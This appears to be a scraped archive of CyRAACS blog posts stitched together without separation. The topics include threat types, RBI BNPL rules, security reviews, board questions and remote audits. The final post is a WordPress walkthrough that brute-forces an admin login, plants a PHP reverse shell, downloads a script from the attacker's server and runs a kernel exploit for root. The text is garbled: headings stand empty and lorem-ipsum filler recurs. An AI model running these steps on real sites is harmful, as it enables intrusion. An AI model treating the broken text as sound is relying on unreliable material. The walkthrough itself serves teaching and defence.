CyRAACS-logo-black-Orignal
Cybersecurity-Threats-Prevention-Mitigation-CyRAACS

Cybersecurity is at the forefront of technological colloquy, as information is the nucleus of the technological revolution, and the one who possesses information reigns supreme over the others. This information can be accessed and utilized against the owner of the said information by miscreants who would most likely profit from such actions. Although there are sundries of laws that prosecute such miscreants, it is the age-old saying that comes to mind that proves preventing a possible threat facilitated by a vulnerability in the system is better than mitigating its after-effects- “Prevention is better than cure”.  

It is imperative to understand the distinction between a cyber-attack and a cybersecurity threat. A cyberattack is any offensive maneuver that targets computer information systems, computer networks, infrastructures, or personal computer devices. Whereas a Cybersecurity threat is a potential negative action or event facilitated by a vulnerability that results in an undesirable impact on a computer system or application. 

There are millions of cybersecurity threats that people encounter on a daily basis whilst going about their day, it is estimated by a Clark School study at the University of Maryland that there are 158,727 attacks per hour, 2,645 attacks per minute, and 44 attacks every second of every day on average across the global spectrum. In fact, there would have been 189 attacks across the world by the time you read this sentence. These attacks are caused by exploiting vulnerabilities in the system and these weaknesses are termed threats. By the end of this article, you will have an introductory ode to the world of Cybersecurity threats, their inhibition, and mitigation. 

The following are the main cybersecurity threats faced by individuals and organizations: 

Malware

Malware is an all-encompassing term for a variety of cyber-attacks including Trojans, viruses, and worms. Malware is simply defined as code with malicious intent that steals data or destroys something on the system it is hosted on.  The purpose of malware is to intrude on a machine for a variety of reasons. From the theft of financial details to sensitive corporate or personal information, malware is best avoided, for even if it has no malicious purpose at present, it could well have so at some point in the future. Downloading infected files as email attachments, from websites, or through filesharing activities and OS vulnerabilities. Clicking on links to malicious websites in emails, messaging apps, or social network posts are popular proliferation method.  

Prevention 

Mitigation 

Steps for mitigation of malware once the system is affected as stated by ncsc.gov.uk : 

Phishing

Phishing is when attackers send malicious emails, communications, or messages designed to trick people into falling for a scam. Typically, the intent is to get users to reveal financial information, system credentials, or other sensitive data. 

Types of phishing attacks: 

Prevention

Password Attack

A password attack refers to any of the various methods used to maliciously authenticate into password-protected accounts. These attacks are typically facilitated through the use of software that expedites cracking or guessing passwords. 

There are three common methods employed to authenticate passwords: 

Prevention 

DDoS- Distributed Denial of Service

DDoS Attack, also known as a "Distributed Denial-of-Service (DDoS) Attack," is a type of cybercrime where the perpetrator overwhelms a server with internet traffic in an effort to prohibit users from accessing linked websites and online services. This attack preliminarily focuses on disrupting the service of a network, and usually involves sending a high volume of data through the network until it gets overloaded and no longer functions. 

Prevention 

Man in the Middle 

An attack in which an attacker is positioned between two communicating parties in order to intercept and/or alter data traveling between them. One major occurrence of Man in the Middle attacks is active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them to make them believe they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. 

Methods involved in Man in middle attacks: 

  1. Attack on encryption: Bypassing SSL/TSL protocols between client and server. 
  1. Interception:  The communication protocol layers are used to intercept the conversation between two nodes on the internet. 
Prevention

Drive-By Download

A drive-by download is when malicious code is unintentionally downloaded into a computer or mobile device, exposing users to various hazards. The malicious code is designed to download malicious files onto the victim’s PC without the user being aware that anything untoward has happened. A drive-by download abuses insecure, vulnerable, or outdated apps, browsers, or even operating systems.  

Prevention 

Website owners can prevent drive-by downloads by doing the following: 

Endpoint users can prevent drive-by downloads by doing the following: 

Malvertising

Malvertising, often known as malicious advertising, is a relatively recent cyberattack method that involves embedding malicious code in online advertisements. These infected ads are typically delivered to customers through reliable advertising networks, making them difficult for both internet users and publishers to detect. 

In a malvertising attack, harmful code is injected into networks of trustworthy internet advertising. Users are often redirected to fraudulent websites using the code. 

Malvertising is typically confused with ad malware or adware—another form of malware affecting online advertisements. 

Prevention

How can end-users help mitigate malvertising

How can publishers help mitigate malvertising 

Rogue Software

Rogue security software is a type of malicious software and online fraud that tricks consumers into thinking their computer has a virus and tries to persuade them to pay for a phony malware removal program that in fact installs malware on their computer. Mobile applications known as "rogue apps" are created to spoof well-known businesses in order to obtain illegal access to data that may be used to carry out fraudulent operations. 

Prevention 

Practice online skepticism. Be aware that rogue security software does exist on the Web, and be vigilant about avoiding it. These programs are designed to appear genuine – meaning they may mimic legitimate programs, use false awards and reviews to rope you in, or employ other deceptive tactics. It’s also a good idea to familiarize yourself with common phishing scams and to be cautious of links in e-mail messages and on social networking sites. 

Digital-Lending-Guidelines-RBI

The banking sector has been at the heart of the Indian economy contributing to more than 40% of the GDP and lending or credit is what fuels the Indian economy contributing more than 60% of the GDP. Digital lending is the new buzzword in banking, where people mean different things. So let us understand what RBI has mandated in its guidelines on Digital Lending.

What is Digital Lending?

Before we understand what digital lending is, let us understand what lending is. Simply put, lending is when a lender provides funds to someone who wants to borrow it (usually at a fixed interest rate) and the borrower agrees to pay back the borrowed amount with interest. It's essentially trading future income for current access to money.

Banks are in the business of collecting our deposits and lending them to those who want to borrow. However, there are many who find it difficult to access loans from banks for various reasons. Maybe they don't have an established credit history, maybe they don't live in regions where the bank operates, or the bank deems the interest too high to provide a loan, etc. So, there is a gap that banks cannot reach and as a result, many digital lending platforms have emerged to serve this segment.

What does the Reserve Bank of India (RBI) think of these digital lending platforms? That's an important question for a startup. Any guidance from RBI on matters such as these is valuable since we will have to first understand it and then live with the regulations at the time of scaling the business.

So, let us see what RBI has to say on digital lending in the guidelines on Digital Lending issued on 2nd September 2022. 

What does RBI think of digital lending?

The purpose of the guideline ( Number CRDIR/DGL-19/02.01.002) is to inform applicants proposing to set up non-bank digital lending platforms about the criteria the Reserve Bank would use to assess their proposals.

The guideline is interesting as it shows the thinking perspective of RBI to explain its views and concerns. Let us try to summarize the key pointers from the guideline.

On June 20th, RBI issued a direction disallowing non-banking Prepaid Payment Instruments (PPI) from loading credit lines on the PPI. This bans PPI wallets from being loaded with credit lines/credit cards. 

What is BNPL? 

BNPL is short-term financing for consumers who can buy products and get short-term credit and pay later for the credit taken. Well, isn’t that what credit cards are used for as well? The concept of BNPL is similar to that of credit cards wherein a consumer makes a purchase through a credit line and the payment is done later- quite literally “Buy Now, Pay Later”. The BNPL market has grown a massive 539% in 2020 and 637% in 2021. 

BNPL vs Credit Card 

Credit Cards are given to individuals with a minimum average income of INR 1-3 lakh per annum. Eligibility for a credit card is based on multiple parameters age, salary (ability to repay), type of employment, and credit score. RBI has definite directions for the issuance and operations of credit cards. 

There aren’t instruments to finance instant loans without an elaborate process. This is where BNPL comes in. Unlike credit cards, BNPL issuers do not require credit scores and other stringent checks prior to onboarding. This makes credit more accessible. While cursory checks are being done on the spending pattern of customers, it taps into the customer’s ability of immediate spending. 

Another difference is that credit cards require a joining and/or an annual fee, while BNPL cards do not levy any such charges/hidden charges on the consumers. That means that all is great if consumers pay their bills on time, however, failing so, the issuer will charge a delay fee. Additionally, the BNPL service is fast and easy to set up as the approvals are almost instant and offer easy repayment options with EMI. 

In the past month, the number of credit cards issued was recorded as 15 Lakh, while 20 Lakh BNPL accounts have been opened. This jump seen in the BNPL market made the traditional credit card issuers jittery. The credit card market is currently operated by major banks in the country. 

buy-now-pay-later-BNPL-process

What’s RBI saying and how is it impacting BNPLs?

While all seemed to be a fairy tale and a bed of roses for consumers and BNPL entities with heavy investments flowing into the market, the Reserve Bank of India (RBI) threw a bombshell that may have put BNPL entities in the backfoot. The RBI notification restricts non-banking Prepaid Payment Instruments (PPI) from loading credit lines on the PPI. This bans PPI wallets from being loaded with credit lines/credit cards through financing done by NBFCs. 

So why does this development impact BNPL companies?

Most popular BNPL players operate using banks’ license/banks’ NBFC license. Alternatively, banks hold PPI license. On the PPI wallet, a credit line was given which was not in line with the PPI directions from RBI. 

The main concern that RBI has raised is the lack of clear guidelines/regulations around BNPL. The main focus with which RBI has been operating in the protection of consumers. While consumers seem to be enjoying it, BNPL as a business does not seem viable unless properly regulated over and above the credit card market. 

Unlike concerns raised by some on RBI’s stand, the regulatory body has indeed mentioned BNPL in their 

“Payment Vision 2025” was released in June 2022. As per the vision document, 


BNPL should be:

  1. Economically viable,
  2. Socially Useful, and
  3. Regulated, and processes around BNPL should be looked at.

The Current Market: Its Ups and Downs 

What’s driving BNPL? 

  1. An increase in spending from consumers is something that is encouraged by the nation as such. This is enabled by helping consumers purchase upfront and pay later with no cost EMI. 
  2. Merchants are benefiting the most as there’s a drastic increase in order values. BNPL companies directly pay merchants a part of the order value.
  3. Instant access to credit. 
  4. The repayment tenure can be chosen by the customer. 
  5. Ease of onboarding and use.

Quite a positive right?

But here’s the catch! BNPL is risky lending and there has been a rising trend of defaults accounting for about 18-19% of delinquencies. One main reason that can be attributed to this trend is the provisioning of BNPL cards to Millennials and GenZ as several of them are unemployed, are studying, or are employed but do not have the ability to repay (as per stats in the US BNPL market). This in turn creates a debt trap for consumers as they tend to pay back the existing loans with further credit lines, while the expenses continue to pile up. India is a savings-based economy, contrary to other countries such as the USA, which is credit based. 

On the contrary, below are the downsides of BNPL: 

  1. Increase in buying that you don’t need, with money you don’t have.
  2. 42% of consumers have made a late payment in the last 1-3 years. 
  3. People don’t realize that they are getting into debt traps. 
  4. The impact on credit score for issuance and repayments is a grey area. The question that arises is whether credit lines are extended to risky or ineligible consumers. 
  5. Currently, BNPL cards are given to consumers who may not be eligible for a credit card which could result in the company extending the services to potential defaulters who may not be able to make the payment on time or who have a history of defaults. 
  6. Consumer protection for repayment is not regulated. 

The business model is quite ambiguous for BNPL players. Also, as mentioned above, there isn’t a mechanism in place currently to link BNPL defaults to the credit score. Above this, BNPLs adopting AML and Fraud Risk mechanisms within their system is not transparent. 

BNPL Stats across the Globe

  1. BNPL has seen a 39% growth across the globe.
  2. It is predicted that 3% of e-commerce reviews will be from BNPL by 2023.
  3. According to The Electronic Transaction Association, the BNPL market has a 30% penetration for Gen Z and Millennials in 2021, rising to 40% by 2025. While only 6% of Baby Boomers chose BNPL in 2021. By 2025 that is expected to increase to 15% for the older generation (YPPs, 2021). 
  4. More than half (57%) of people say they regretted making a purchase through BNPL because the item was too expensive. 
  5. 31% of buy now, pay later users have made a late payment or incurred a late fee. Over one-third, (36%) of BNPL users say they are at least somewhat likely to make a late payment within the next year. 

Recently, OpenPay, a BNPL company in Australia paused operations in the USA due to defaults and rising interest rates. Klarna, another fintech in BNPL has lost its valuation from $45 Billion to $6.5 Billion in the last round of funding and another Australian BNPL firm has lost its valuation to $300 Million from $9 Billion. 

Conclusion:

Fintechs and BNPLs shouldn’t worry yet as it’s a wait-a-watch game with RBI. The aura in the market is that the central bank will issue new guidelines for the BNPL segment that will not only regulate the sector but also reshape it all together with a focus on consumer protection, risk management, and overall security. 

The Indian Fintech and BNPL spaces are nascent and not very mature. The regulator has put in some basic controls at this point in time to ensure that the consumer is not affected by a debt trap, at the same time realizing that for having a spending economy, these kinds of instruments are necessary. The balance may tilt from one side to another every now and then, but at this point, we are poised for some more interesting creative fintech instruments coming in with the regulator constantly on the catching-up game. 

The cyber security threat landscape is rapidly evolving. Increasingly sophisticated attacks, multiple threat actors, strict regulations on security and privacy, new-age trends on BYOD, remote working and growing adoption of cloud, and digital transformation initiatives are just some of the varied challenges that Information Security teams face. And the lack of adequate skilled resources compounds these challenges to manage various security responsibilities. 

As news comes in every week of more cyber-attacks, Chief Information Security Officers (CISO) are searching for solutions and measures to improve their organization’s cyber security posture. Often, solution providers pitch various solutions/technologies to solve these challenges. Information Security teams assure that these solutions, with built-in next-gen features, can flag attempts to disrupt business, prevent attacks and minimize impact. 

But multiple studies and industry surveys over the years have shown that procuring and implementing a solution does not mitigate the threat on its own. Often these implementations face challenges like high costs, lack of skilled resources to manage the solutions, poor or inadequate configuration of policies, absence of integration with other solutions, insufficient supporting workflows, and processes, and so on. 

So, if just buying a solution and implementing is not enough, where does one start? The answer is Security Architecture Review — an activity that can help organizations understand their security threats and identify which solutions can mitigate these risks. The complex nature of the IT infrastructure of organizations today means that a thorough review is needed to identify the critical security risks and the solutions to address them. 

Security Architecture Review is a holistic review of security that covers networks, Data, Applications, Endpoint, Cloud, etc. It identifies gaps in your Architecture, Policies, and Controls that may put your critical assets at risk from attackers. 

So, what does a Security Architecture Review involve?

Study the organization’s Business, IT, and Security

Security Architecture Review begins with a study of the Business and IT environment of an organization and the key security and privacy requirements that are mandated by clients and regulations like GDPR, CCPA, PCI DSS, etc. Organizations wanting to adopt best practices can look at information security and data privacy standards and frameworks like NIST 800-53, ISO 27001, CSA STAR, etc. 

Identifying security and privacy risks is the next critical step as Information Security teams need to know what assets, applications, and processes need stringent controls and monitoring. 

Assess the current Security Architecture 

The next step is to study the existing architecture for network and security, understand cloud adoption, study existing solutions for security for design and implementation effectiveness, and identify gaps. We also recommend assessing the configuration of key solutions to understand the implementation effectiveness and identify any gaps. 

Understand gaps across Security Domains 

After studying architecture, it is important to assess the current solutions implemented and their design effectiveness as per the security domains such as Access, Patch, Monitoring, etc. This helps in identifying the solutions that address various security and privacy risks. 

SAR-important-for-Cybersecurity

Build the Future State

After identifying the gaps, it is important to identify the right solutions to mitigate the gaps and address critical risks. Again, the solutions must address a few key criteria–risk mitigation, compliance management, integration with other solutions and interoperability, monitoring capabilities, and the ability to provide detailed reports as per organizational policies. 

While identifying solutions, one must also consider the state of the infrastructure–On-prem, cloud or hybrid. One must also look at security components that are provided by Cloud Service Providers. 

The end-state architecture must comprise solutions that offer protection from critical risks, integrate with other solutions deployed to provide relevant alerts and minimize the impact of any attack. Finally, one must also fortify the Information Security team with Subject Matter Experts (SMEs) who will manage the solutions. 

Benefits and Outcomes of Security Architecture Review

Conclusion

No matter how secure your organization’s cyber defenses may be, a Security Architecture Review (SAR) can identify potential vulnerabilities and recommend countermeasures. The process begins with an assessment of your current state of security, followed by the development of a roadmap for improvement. 

A SAR is especially important in the current environment, where cloud security services are becoming more popular. By definition, the cloud is a distributed system that spans multiple data centers and devices. This makes it more difficult to secure and increases the risk of data breaches. 

Fortunately, many Cyber Security Companies in Bangalore offer SAR services. They can help you identify and mitigate vulnerabilities in your systems. Reach us for more information at [email protected]

Fifteen years ago, cloud infrastructure was a new and untested concept. Today it is the dominant form of data storage and computing services. With this shift, cybercriminals have also found ways to make their attacks more effective for smaller organizations. To prepare for the coming year, we have compiled 5 benefits of cloud infrastructure security in 2022.  

 

Top 5 Benefits of Cloud Infrastructure Security 2022

  

Comprehensive Security for All Devices

It is important for all internet-connected devices to be secured by the most advanced cybersecurity solutions. The rise in smart home IoT devices has created more potential points of vulnerability for security breaches. The cloud moves changes data from a centralized data center to a decentralized storage service, which is considered a key differentiator when it comes to network security. Cloud infrastructure security providers must have the ability to not only protect corporate networks but individual users as well, with a focus on privacy and control.  

  

Easier to Scale

Companies are realizing the benefits of cloud infrastructure. They are quicker to scale, cheaper to maintain, and more flexible. Many organizations are considering adoption due to these reasons. One thing to keep in mind is that all companies face new security threats as they move their operations into the cloud. If you don't already have a robust cybersecurity strategy in place, now's the time to make sure you're covered before jumping ship.  

  

Cost-Efficient

Cloud Infrastructure Security 2022 may be the best option for companies looking to cut costs while simultaneously improving their existing security measures. Public cloud computing has become an increasingly popular alternative to on-premises private cloud deployments. Public cloud deployments offer several benefits over on-premises deployments, including lower upfront costs, elastic scalability, and the ability to scale up and down as needed.  

  

Improved Disaster Recovery Processes

Disaster recovery processes have improved dramatically in recent years with the advent of cloud infrastructure security services. These services are cost-effective for businesses that are looking to grow, improve their customer retention rates, or want to reduce their capital expenses. These services affect all levels of the cloud infrastructure from firewalls and network security to data storage and encryption. In particular, the availability and affordability of cloud infrastructure security services have allowed companies to focus on their core business.  

  

Increased Innovation and Collaboration

Economic growth has seen many benefits since the introduction of cloud infrastructure. One of the most prominent advantages is that it has helped to create jobs in the technology sector, which in turn has created more competition in an industry with high barriers to entry. Cloud data storage has allowed organizations to save money on hardware and operating expenses, while also allowing them to access their information anywhere they need it.  

 

Conclusion

Cloud infrastructure security is a complex and diverse field. The number of IT professionals who specialize in cloud infrastructure security is growing at an exponential rate, but the demand for qualified talent outpaces supply. It's important for organizations to make sure they have a comprehensive understanding of what cloud infrastructure security entails and how it can add value to their company.  

Cloud security services are very important for businesses that want to keep their data safe. There are many cloud security companies in Bangalore that can help you with this. Cloud computing allows you to store your data in the cloud and access it from anywhere. This is very convenient, but it also comes with some risks. It’s important to make sure that you choose a reputable cloud security company that will keep your data safe.

security-risk-management-CyRAACS-blog

Executive leaders of organizations and board members are ultimately responsible for ensuring the long-term security of their organization, and it helps in mitigating cyber risks. As board members realize how critical risk and security management is, they ask leaders more nuanced and complex questions. Interest in security and risk management (SRM) is all-time high at the board level. In 2019, Gartner conducted the security and risk survey and realized that four out of five respondents noted that security risk influences decisions at the board level. 

The Gartner research helps security and risk management leaders analyze five categories of questions that should be prepared to answer at any executive or board-level meetings. Here are those questions. 

Let’s discuss each of these in detail. 

The Trade-Off Question - Are we 100% secure?  

The trade-off question is that the security and management risk leaders struggle a lot. The question "Are we secure?" needs improvising and is generally asked by the board members who are uneducated and unaware of the impact of security risks on the business. In this scenario, it is impossible to prohibit 100% of the incidents. The CISO's responsibility is to help identify and evaluate the potential risks for an organization and allocate resources to manage them.  

According to Gartner's report, a security and risk management leader in response to this question might say, 

"It is impossible to remove all resources of the information risk considering the evolving nature of the cyber threat landscape. My responsibility is to work with other aspects of the business to execute controls for managing security risks that can prevent us from improving operational efficiency and brand image. There is no such thing as 'perfect protection' in security. We have to reassess continually how much risk is appropriate as the business grows. We aim to develop a sustainable program to balance the requirements to protect against the needs to run a business”. 

The Landscape Question - How bad is it out there? 

Most of the board members want to know their security compared to peer organizations. They read threat reports and blogs, listen to broadcasts, and even are forced by the regulation to understand such things. Gartner recognizes the need to discuss this landscape. Leaders need to avoid trying to quantify risks to a possible extent and attaching certain budget figures to the mitigation cost depending on something external. Moreover, when benchmarks give some material for conversation, they must be a negligible factor in the decision-making process.  

Here are some responses that security and risk management leaders can give while discussing the wider security landscape. 

External Events Responses 
Our primary competitor experienced a public, successful attack. We have a similar vulnerability that can facilitate the attack, and we are addressing that weakness. Enhanced monitoring abilities have been implemented. 
There is an increased number of attacks against the electricity grids in three of the national presence points. We don't expect to become a direct target. Business continuity plans are being tested and updated to overcome the prolonged outage. 
We fall under the scope of the new EU General Data Protection requirements. We have conservative and cautious privacy practices in place. 

The Risk Question - Do we know what our risks are? 

A risk outside the tolerance needs an antidote to bring it within tolerance. It does not require dramatic changes in a short time, so beware of overreacting. In the Gartner report, they present a way to defend the risk management decision, and you can change it according to your organization's risk tolerance.  

One of the most common issues encountered in the report is that the evaluations are subjective and depend on flawed methodology. Security leaders must have evidence to support the evaluation, even when they are not called to present it. Another aspect that needs to be considered is whether to depict the typical outcome or the worst. For instance, most incidents in mild outcomes are within the ability of most companies to absorb. However, there is an infrequent incident that can result in a catastrophic outcome.  

The Performance Question - Are we appropriately allocating resources? 

Security is always a moving target. The security team needs to demonstrate their behavior to ensure the organization stays safe. It is particularly important to figure out if the resources are allocated appropriately and where the money is spent. The original strategy proposal should have margins for errors concerning the deadline and the budget. As far as there are overruns within these margins, they must be noncontroversial.  

There may be valid reasons even if the overruns are outside the margins. The balanced scorecard approach is a way to understand how security contributes to business performance. In this approach, the top layer defines the business aspiration, and organization performance against those aspirations is expressed using a traffic light mechanism. However, it's not the only way. Some organizations have different types of dashboards to discuss business performance.  

The Incident Question - How did this happen? 

An incident is unavoidable, and treatment is a blessing in disguise. Security and risk management leaders should be aware that in some scenarios, incident details may have been tightly controlled (such as sensitivities associated with the incident). Using the fact-based approach and explaining your knowledge will eliminate the mystery and give confidence that you have control over the incident. Acknowledging the incident provides details on the business impact, outlines the flaws or gaps needed to work out, and offers a mitigation plan.  

Decipher Complex Board Question 

There are usually no deterministic answers to the board question, and responses are generally more about showing options for sponsorship instead of a definitive course of action. The options can vary based on the context of the discussion, the maturity of the board, the communication skills of the SRM leader, and the frequency of reporting. However, understanding and answering board questions require everyone to understand their roles. Therefore, the SRM leader should know that the board is interested in facilitating the business goal.  Any query that may seem immature, ignorant, or complicated has a purpose behind it. 

Wish you all a very happy 2021 and be a year filled with success, good health, and happiness to you and all your loved ones. With the year 2020 and the pandemic overwhelming us, we must be conscious of the increase in cyber security threats that are looming in front of us. Here are a few thoughts and considerations for the unenviable role of the CISO for a great start to 2021!

Make the management part of your problem

Senior management does not know the technicalities of how the breach occurs, nor they should need to know. However, they should be clearly aware of the risks thereof. Ensure that the senior management/ board is completely up-to-date of all risks. Increase your frequency of meetings and provide a crisp update of the open risks and how you are working to mitigate them with clear established timeline and dependencies. Costs and budget overruns should be highlighted ahead of time. Bring in business-friendly and business-relevant cybersecurity metrics and report them periodically. This way the management is more forthcoming in providing the necessary authority and help prioritize your initiatives.

Get the appropriate budget

Budget definition and allocation on a percentage of IT spend, a percentage of cost of breach, a percentage of business growth YOY – various models exists. While each has its benefits and pitfalls, the budget should be commensurate with your risk appetite. Continuing from the point above on having the management ‘onboard’ on cyber security initiatives will pave a long way in ensuring that an appropriate budget is allocated. Let us understand one thing clear. The world expects ‘more’ with ‘less’

Clearly identify your security partners

One of the top fields where the skills available and the market-needs gap is widening. It is expected that with the CAGR of 17% in cyber security (products and services), this area can become the CISO’s nightmare quickly. Relying on experts to do the job is also essential. This can be problem-solved by engaging the right eco-system partners to do your job. Security technologies, security governance, security operations are niche areas and picking the right partner will ensure that they stay with you and provide you the much-needed assurance and help address your problem by bringing in the right skills. Remember, it is not required to boil the ocean.

Evolve Your Security to Protect Your Remote Infrastructure

Secure your remote workforce by proactively protecting against zero-day malware and phishing, consider human and technological factors to avoid falling victim to phishing attacks. In response to the coronavirus pandemic, Gartner analysts observed a more than 400% increase in client inquiries related to remote access technologies for the months of March, April, and May in 2020, compared to the previous three months. Furthermore, a recent Gartner survey reveals that 41% of employees are likely to work remotely post coronavirus pandemic.

Continuous monitoring for all critical assets 

90% of breaches in cloud-based infrastructure were due to configuration-related issues. Periodic assessment ( like once a year, once a quarter) may not be sufficient in today’s scenario. The new buzzword is continuous monitoring.  Continuous monitoring of critical assets would be an aid to enable rapid detection of compliance issues and security risks within the IT infrastructure that could lead to compliance violations. This would help understand real-time changes to the infrastructure and with a good threat intelligence feed it is possible to address zero-day attacks with much robustness with effective continuous monitoring.

Please reach out to us to know more about this to [email protected] or personally to me at [email protected].

Providing insights in the changed risk and opportunity landscape

Global situations relating to the COVID-19 pandemic have impacted the business and has also impacted the work of auditors. The current situations challenge the conventional methods adopted for an audit. The current uncertainty and unpredictability may create risks of material misstatement in the audits.

There anyone who loves or pursues or desires to obtain pain of itself, because it is pain, but because
occasionally circumstances occur in which toil and pain can procure him some great pleasure. To take a
trivial example, which of us ever undertakes laborious physical exercise,

Predicting the unpredictable: Adapting to the changing needs” has always been a key mantra, and this holds true today with the emergence of COVID-19.

Considering the recent situation and the paradigm shift in business operations CyRAACS would advise the audit teams to adopt the below methods for a precise, fact-based audit.

1. Re-evaluate the audit scope

With the change in the mode of business operations and the technology implemented, auditors may have to relook at the scope of the audit. Include the technology and architecture deployed to support remote working. Auditors may have to re-evaluate the effort estimates and timelines based on the changes in the scope of the audit.

2. Utilize Collaboration tools and communicate

Conference or video call facilities or collaboration tools such as Skype, Teams, Slack, etc. allow for regular communication with clients and team members. Extensively use collaboration tools to communicate what you need and what you have been working on. An additional point to note while implementing these communication and collaboration technologies is to keep an eye on the advisories issued with the vulnerabilities identified in these technologies. Any open-source tools adopted may be evaluated for any security flaws before implementation.

3. Use cloud services for storing evidence

Utilize cloud storage services to collect audit evidence. The cloud services like OneDrive, SharePoint enable gathering adequate, appropriate audit evidence remotely. Ensure all security controls are implemented in the cloud service being used for restricting any data leakages. Additionally, ensure that the current cloud platform being used is accessible to all stakeholders required to provide data for the audit.

4. Technology controls to be stringently implemented by the IT Team

In the event of the recent crisis and the work-from-home model adopted globally, the IT team may be evaluating stricter and stringent controls on implementing digital certificates, Multi-Factor Authentication to the environment, etc. Auditors may integrate the additional security controls in their methodology to adapt to the changing environment.

5. Check for regulatory/contractual requirements for evidence sharing

All the regulatory requirements for data hosting, data sharing may be validated before sharing the data with the auditors. In the case of strict organizational policies on data sharing, organizations may create a segment or a white room for the auditors to securely review the evidence.

6. Centralize work performed by other auditors

Centralize the audit engagement and the documentation on the cloud platform. This would enable the audit team to coordinate and review the work of auditors to meet the requirements in auditing and reporting standards.

7. Flexibility in reporting audit findings

As audit teams respond to the crisis and changing business risks in differing ways there may arise a need for more adaptable and flexible auditing techniques During this period, auditors may not be restricted to the traditional reporting methods and may consider different reporting templates like unrated reporting, e-mail reporting, mid-review reporting.

8. Reassess key risks in a real-time environment

Risk changes rapidly with the slightest change in the environment. Re-Assess the current environment to identify the new threat landscape and associated risks. The exercise would give insights into the changing risk landscape and aid in developing a robust risk mitigation strategy.

Additional Articles for a good read and understanding of global security controls and audits:

1. NBS Special Publication 500-153: Guide to Auditing for Controls and Security: A System Development Life Cycle Approach

2. NIST Special Publication 800-53 A: Assessing Security and Privacy Controls in Federal Information Systems and Organizations.

Introduction

WordPress is a free and open-source PAAS structure that is being used by millions across the globe as a content management system. Its features include the integration of various plugins and themes.

Also, there are many vulnerabilities associated with the plugins and themes being used within WordPress to date. According to the statistics, 73.2% of the most popular WordPress installations are vulnerable to date. These can be identified using automated tools and can be exploited. One such example is explained in this blog on how an adversary can gain root access by exploiting a vulnerability present inside the WordPress theme engine.

There anyone who loves or pursues or desires to obtain pain of itself, because it is pain, but because
occasionally circumstances occur in which toil and pain can procure him some great pleasure. To take a
trivial example, which of us ever undertakes laborious physical exercise,

Below are the steps to perform Privilege escalation for a vulnerable WordPress theme engine:

Nmap Enumeration

Run Nmap enumeration scan to discover the open ports and services running on the target host.

Nmap reveals HTTP service running on port 80. Also, the directories discovered in the HTTP-enum scan points to the WordPress login page.

WordPress Login Panel

Browse to the login page of WordPress http://*target IP*/wp-login as shown in the screenshot below:

Now, to retrieve the username and password we need to run a brute-force scan using WPScan.

WPScan is a scanner built for enumerating and brute-forcing the usernames and passwords for WordPress.

WordPress enumeration using WPScan

Let us first enumerate a user enumeration scan to discover the user accounts linked with WordPress using the below command:

wpscan –url *target IP* –enumerate u

The user enumeration scan reveals the usernames of the users linked with WordPress account as shown in the screenshot below:

Run a Bruteforce scan

Now that we have the username, we shall run a brute-force scan to enumerate the password for the admin account. We will a run a brute-force scan to enumerate the password for the admin account for which we use the below command:

wpscan –url *target IP* –wordlist /root/rockyou.txt –username admin

As shown in the below screenshot, as part of the brute force scan we get the username and password for the admin account. The password for the admin account is princess.

Using the username and password obtained in the WPScan we try to login into the WordPress site and navigate to the themes section in the WordPress. WordPress plugins and themes are the vulnerable points for any WordPress website.

WordPress Theme Engine

After login navigate to Appearance>Themes>Editor

Now, we observe that there are multiple .php files in the templates and archives section. We could use any of these to upload the PHP reverse shell. For example, we will try to use archive.php file to upload the PHP reverse shell.

Replace the contents of archive.php file and replace it with our PHP reverse shell.

PHP Reverse shell to gain local privilege

In this case, let us use a PHP reverse shell that is downloaded from pentest monkey.

Run the below command and download the shell:

wget http://pentestmonkey.net/tools/web-shells/php-reverse-shell/ php-reverse-shell-1.0.tar.gz

Unzip the file using $tar -xzf php-reverse-shell-1.0.tar.gz command and copy the contents of the file in archive.php file in the browser.

The IP address and port should point to the attacking system’s IP and listener port as shown in the screenshot below:

Click on the update file at the bottom of the page and we observe that the files get updated successfully with the PHP reverse shellcode.

Gaining local user access

Now, open a new terminal and start a netcat listener on port 443 which is specified in the PHP reverse shell script using the below command:

·        nc -nvlp 443

Now, navigate to the modified archive.page in the browser using the below link:

·        http://*target IP*/wp-content/themes/twentytwelve/archive.php

As shown in the screenshot below, after traversing to the modified archive.php file in the web browser we get a low privilege reverse shell from the attacking systems IP to the victims IP.

We got a low privilege access for webserver user “www-data”.

The next step is to elevate the privilege and get root access.

Let us run a Linux privilege checker python script to enumerate the system info and check for the world-writable files.

For that run python server using the below command to transfer file from attacker’s system to target system

python -m SimpleHTTPServer 80

Checking file permissions using Privchecker

Download the linux.privchecker.py file on the tmp directory of the target system using the below command

wget http://*local IP*/linuxprivchecker.py

After enumerating we also know that the world-writable directory is the tmp directory for the user www-data.

Local Privilege Escalation

We know that the Linux version in use is Linux 2.6.32. Let us download a python script from exploitdb named as Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) – ‘CAN BCM’ Local Privilege Escalation.

Download the script in the world-writable directory “tmp” which was discovered as part of the enumeration scan.

This script might be helpful in elevating from local privilege to root privilege.

Compile the script using the below command and save it in the output file named as rootpriv:

·        gcc 14814.c -o rootpriv

Now, run the output file using ./rootpriv command.

Gaining Root Access

Once the script is successfully executed using whoami check the current user.

We get access to the ROOT account as shown in the below screenshot:

Check for the files present in the root directory.

There is an interesting file wp.sql which has all the database tables and values in it which could be used to craft SQL injection attacks. Below are the contents of wp.sql file:

The blog summarizes how a user can gain root access using a vulnerable WordPress theme engine.

There are many other loopholes in WordPress that can be used to elevate privilege and retrieve sensitive information.

Preventive measures

Below are the measures you can adopt to keep your WordPress site secure:

1.   Sucuri Scanner

Install and use WordPress security plugin – Sucuri Scanner.

We need to set up an auditing and monitoring system that keeps track of everything that happens on the website. This includes file integrity monitoring, failed login attempts, malware scanning, etc.

The best part about Sucuri’s firewall is that it also comes with a malware cleanup and blacklist removal guarantee. Basically, if you were to be hacked under their watch, they guarantee that they will fix your website (no matter how many pages you have).

2.   Change the Default “admin” username.

In the old days, the default WordPress admin username was “admin”. Since usernames make up half of the login credentials, this made it easier for hackers to do brute-force attacks.

Since WordPress doesn’t allow you to change usernames by default, there are three methods you can use to change the username.

3.   Disable File Editing

WordPress comes with a built-in code editor which allows you to edit your theme and plugin files right from your WordPress admin area. In the wrong hands, this feature can be a security risk which is why we recommend turning it off.

4. Add Two Factor Authentication

The two-factor authentication technique requires users to log in by using a two-step authentication method. The first one is the username and password, and the second step requires you to authenticate using a separate device or app.

